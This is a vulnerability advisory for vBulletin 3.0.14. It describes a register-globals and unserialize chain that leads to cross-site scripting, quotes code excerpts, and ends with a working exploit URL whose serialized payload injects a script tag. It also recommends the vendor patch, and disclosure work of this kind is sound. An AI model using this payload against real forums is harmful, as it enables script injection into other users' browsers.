Summary Software: vBulletin Sowtwares Web Site: http://www.vBulletin.com Versions: 3.0.14 Exploit: Available Solution: Available Discovered by: imei addmimistrator Risk Level: Mediume -Description- There is a security bug in most powerfull & common forum software vBulletin version 3.0.14 that allows attacker performe a XSS attack without any limitation. Bug is in result of a series of mistakes in Kernel coding and peripheral files that can cause to registering varables in global area in first moments of runing and an attacker can initualize any varable. Cause of accurate programming method of vB, this is not exploitable in first view, but as a project, I could find some entries for exploiting this bug, and converting a Potential to an Exploit. Exploit is available because of some reasons that I demonstate them below: 1. weakness of includes/init.php that let user to bypass anti-direct-calling global.php files{ there are four global.php files in vB}. 2. Reregisterring varables from user input into global area defaultly. 3. calling a function with a none initualized varable in modcp/global.php 4. unserializing passed varable into same other array in two sepearated times!{they first unserialize one memeber of passed array and do some things on it and next, unserialize another value of passed array into that array again(pre inited vars can overwritten)} 5. finally, not to HTMLSPEACIACHARing some of that values in includes/adminfunctions.php{print_cp_login()} -See Also- includes/init.php{~290} if (!defined(THIS_SCRIPT) AND strpos(strtolower($script), global.php) !== false) { die(Critical Error global.php must not be called directly.); } ********************** includes/init.php{~100} // re-register globals this code should not be necessary by final version if (!defined(NO_REGISTER_GLOBALS)) { // define NO_REGISTER_GLOBALS to emulate register_globals as off // Censored cause of long ********************** modcp/global.php{~40-50} $stylevar = fetch_stylevars($_tmp, $bbuserinfo); //passing a none intualized variable to function ********************** includes/function.php{~3630} function fetch_stylevars(&$style, $userinfo){ //Censored $stylevar = unserialize($style[stylevars]); $stylevar[textdirection] = ltr; $stylevar[left] = left; $stylevar[right] = right; //Censored $stylevar = array_merge($stylevar,unserialize($style[csscolors])); //overwrite mistake!;)) ********************** includes/adminfunctions.php{~25} function print_cp_login(){ //Censored {~130} ; white-space:nowrap> -Exploit- forum/mods/glo%62al.php?_tmp[csscolors]= a:1:{s:5:%22right%22;s:27:%22 %22%3E%3Cscript%3Ealert(1)%3C/script%3E%22;} -Solution- Upgrade to vendores provided patch. -Credit- Discovered by: imei addmimistrator addmimistrator(4}gmail(O}com www.myimei.com myimei.com/security